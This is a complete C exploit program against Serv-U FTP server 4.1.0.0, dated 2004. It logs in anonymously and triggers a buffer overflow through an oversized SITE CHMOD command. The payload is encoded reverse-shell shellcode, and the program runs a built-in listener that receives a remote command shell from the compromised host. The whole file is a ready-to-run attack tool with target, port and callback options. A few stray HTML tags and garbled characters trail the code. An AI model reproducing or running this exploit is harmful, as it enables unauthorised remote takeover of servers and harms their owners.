/* date: 25 janv 2004 software: Serv-U 4.1.0.0 (prolly others) vendor: RhinoSoft, http://www.serv-u.com/ credits: kkqq , http://www.0x557.org/release/servu.txt greets: rosecurity team, int3liban notes: should work on any NT, reverse bindshell, terminates the process properly handle directories author: mandragore, sploiting@mandragore.solidshells.com cheap changelog: 27 jan 2004 improved banners handling (select()'s), added listener, default ip gathering (needs ifconfig & gawk) */ #include #include #include #include #include #include #include #include #include #include #include #define fatal(x) { perror(x); exit(1); } unsigned char sc[]={ // reverse bindshell, 204 bytes, uses import table 0x33,0xC0,0x04,0xB6,0x68,0xE2,0xFA,0xC3,0xCC,0x68,0x80,0x36,0x96,0x46,0x50,0x68, 0x8B,0x34,0x24,0xB9,0xFF,0xD4,0xF2,0xF1,0x19,0x90,0x96,0x96,0x28,0x6E,0xE5,0xC9, 0x96,0xFE,0xA5,0xA4,0x96,0x96,0xFE,0xE1,0xE5,0xA4,0xC9,0xC2,0x69,0x83,0xE2,0xE2, 0xC9,0x96,0x01,0x0F,0xC4,0xC4,0xC4,0xC4,0xD4,0xC4,0xD4,0xC4,0x7E,0x9D,0x96,0x96, 0x96,0xC1,0xC5,0xD7,0xC5,0xF9,0xF5,0xFD,0xF3,0xE2,0xD7,0x96,0xC1,0x69,0x80,0x69, 0x46,0x05,0xFE,0xE9,0x96,0x96,0x97,0xFE,0x94,0x96,0x96,0xC6,0x1D,0x52,0xFC,0x86, 0xC6,0xC5,0x7E,0x9E,0x96,0x96,0x96,0xF5,0xF9,0xF8,0xF8,0xF3,0xF5,0xE2,0x96,0xC1, 0x69,0x80,0x69,0x46,0xFC,0x86,0xCF,0x1D,0x6A,0xC1,0x95,0x6F,0xC1,0x65,0x3D,0x1D, 0xAA,0xB2,0xC6,0xC6,0xC6,0xFC,0x97,0xC6,0xC6,0x7E,0x92,0x96,0x96,0x96,0xF5,0xFB, 0xF2,0x96,0xC6,0x7E,0x99,0x96,0x96,0x96,0xD5,0xE4,0xF3,0xF7,0xE2,0xF3,0xC6,0xE4, 0xF9,0xF5,0xF3,0xE5,0xE5,0xD7,0x96,0x50,0x91,0xD2,0x51,0xD1,0xBA,0x97,0x97,0x96, 0x96,0x15,0x51,0xAE,0x05,0x3D,0x3D,0x3D,0xF2,0xF1,0x37,0xA6,0x96,0x1D,0xD6,0x9A, 0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46 }; char *user="anonymous"; char *pass="not@for.you"; char *path="/incoming"; int s, ret; char *buff; int verbose=0; struct sockaddr_in saddr; int lhost, lport=8888; void usage(char *argv0) { printf("usage: %s -d [options]\n",argv0); printf("options:\n"); printf(" -d target ip\n"); printf(" -p target port (default 21)\n"); printf(" -u username to log with (default %s)\n",user); printf(" -s password to log with (default %s)\n",pass); printf(" -w writable directory (default %s)\n",path); printf(" -H listening host (default %s)\n", \ inet_ntoa(*(struct in_addr *)&lhost)); printf(" -P listening port on host (default %d)\n",lport); printf(" -v verbose (set to 1 to enable)\n"); printf("\n"); exit(1); } void reads() { fd_set fds; struct timeval tv; __next: ret=recv(s,buff,4095,0); memset(buff+ret,0,1); if (verbose) printf("%s",buff); FD_ZERO(&fds); FD_SET(s,&fds); tv.tv_sec = 1; tv.tv_usec = 0; if (select(s+1, &fds, NULL, NULL, &tv)!=0) goto __next; } int getip() { char buff[17]=""; FILE *f; f=popen("echo -n `/sbin/ifconfig|grep Bcast|" \ "gawk '{\\$0=gensub(/:/,\" \",1);print $3;exit;}'`","r"); fgets(buff,16,f); pclose(f); return inet_addr(buff); } void callback(int port) { fd_set fds; int s_len=sizeof(saddr); int sn; buff=(char *)malloc(4096); saddr.sin_family = AF_INET; saddr.sin_addr.s_addr = 0; saddr.sin_port = htons(port); printf("[.] setting up listener on port %d..\n",port); s=socket(2,1,6); ret=bind(s,(struct sockaddr *)&saddr, sizeof(saddr)); if (ret==-1) { // we don't want to crash servu if not needed perror("[-] shell.bind"); kill(getppid(),SIGUSR1); exit(1); } listen(s,1); sn=accept(s,(struct sockaddr *)&saddr,&s_len); printf("[+] got connection from %s, entering shell..\n", \ inet_ntoa(*(struct in_addr *)&saddr.sin_addr.s_addr)); while(1) { FD_ZERO(&fds); FD_SET(0,&fds); FD_SET(sn,&fds); if (select(sn+1, &fds, NULL, NULL, NULL) < 0) fatal("[-] shell.select "); if (FD_ISSET(0,&fds)) { ret = read(1,buff,4096); send(sn,buff,ret,0); } if (FD_ISSET(sn,&fds)) { if ( (ret=recv(sn,buff,4096,0)) < 1 ) fatal("[-] shell.recv"); write(1,buff,ret); } } } void killchild() { printf("[-] got signal from parent, exiting.\n"); exit(1); } void killmain() { printf("[-] got signal from child, exiting.\n"); exit(1); } int main(int argc, char **argv) { short port=21; int target=0; int i, pid; int delta=423; int callebx=0x10077A92; // libeay32.dll char jmpback[]="\xe9\xff\xfe\xff\xff\xeb\xf9\x90\x90"; // jmp -256 char chmod[]="SITE CHMOD 777 "; printf("[%%] Serv-u v4.1.0.0 sploit by mandragore (v2)\n"); lhost=getip(); if (argc<2) usage(argv[0]); while((i = getopt(argc, argv, "d:p:u:s:w:H:P:v:"))!= EOF) { switch (i) { case 'd': target=inet_addr(optarg); break; case 'p': port=atoi(optarg); break; case 'u': user=optarg; break; case 's': pass=optarg; break; case 'w': path=optarg; break; case 'H': lhost=inet_addr(optarg); break; case 'P': lport=atoi(optarg); break; case 'v': verbose=atoi(optarg); break; default: usage(argv[0]); break; } } if ((target==-1) || (lhost==-1) || (lhost==0)) usage(argv[0]); printf("[.] if working you'll have a shell on %s:%d.\n", \ inet_ntoa(*(struct in_addr *)&lhost),lport); printf("[.] launching attack on ftp://%s:%s@%s:%d%s\n", \ user,pass,inet_ntoa(*(struct in_addr *)&target),port,path); pid=fork(); switch(pid) { case 0: signal(SIGUSR1,killchild); callback(lport); break; default: signal(SIGUSR1,killmain); break; } lport=lport ^ 0x9696; lport=(lport & 0xff) << 8 | lport >>8; memcpy(sc+0x5a,&lport,2); lhost=lhost ^ 0x96969696; memcpy(sc+0x53,&lhost,4); buff=(char *)malloc(4096); saddr.sin_family = AF_INET; saddr.sin_addr.s_addr = target; saddr.sin_port = htons(port); s=socket(2,1,6); ret=connect(s,(struct sockaddr *)&saddr, sizeof(saddr)); if (ret==-1) { kill(pid,SIGUSR1); sleep(1); fatal("[-] connect()"); } reads(); sprintf(buff,"USER %s\r\n",user); if (verbose) printf("%s",buff); send(s,buff,strlen(buff),0); reads(); sprintf(buff,"PASS %s\r\n",pass); if (verbose) printf("%s",buff); send(s,buff,strlen(buff),0); reads(); if (strstr(buff,"230")==0) { printf("[-] can't login\n"); exit(1); } else printf("[+] logged in.\n"); sprintf(buff,"CWD %s\r\n",path); if (verbose) printf("%s",buff); send(s,buff,strlen(buff),0); reads(); // verify directory sprintf(buff,"PWD\r\n",path); send(s,buff,strlen(buff),0); ret=recv(s,buff,1024,0); memset(buff+ret,0,1); i=strstr(buff+5,"\x22")-buff-5; if (i!=1) i++; // trailing / printf("[+] sending exploit..\n"); bzero(buff,4096); memset(buff,0x90,600); strcat(buff,"\r\n"); delta-=i; // strlen(path); memcpy(buff,&chmod,strlen(chmod)); memcpy(buff+delta-9-strlen(sc),&sc,strlen(sc)); memcpy(buff+delta-9,&jmpback,5+4); memcpy(buff+delta,&callebx,4); send(s,buff,602,0); ret=recv(s,buff,1024,0); if ((ret==0) || (ret==-1)) { kill(pid,SIGUSR1); sleep(1); sleep(1); fatal("[+] done"); } printf("[-] remote servu isn't vulnerable.\n"); memset(buff+ret,0,1); printf("%s",buff); close(s); exit(0); }
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß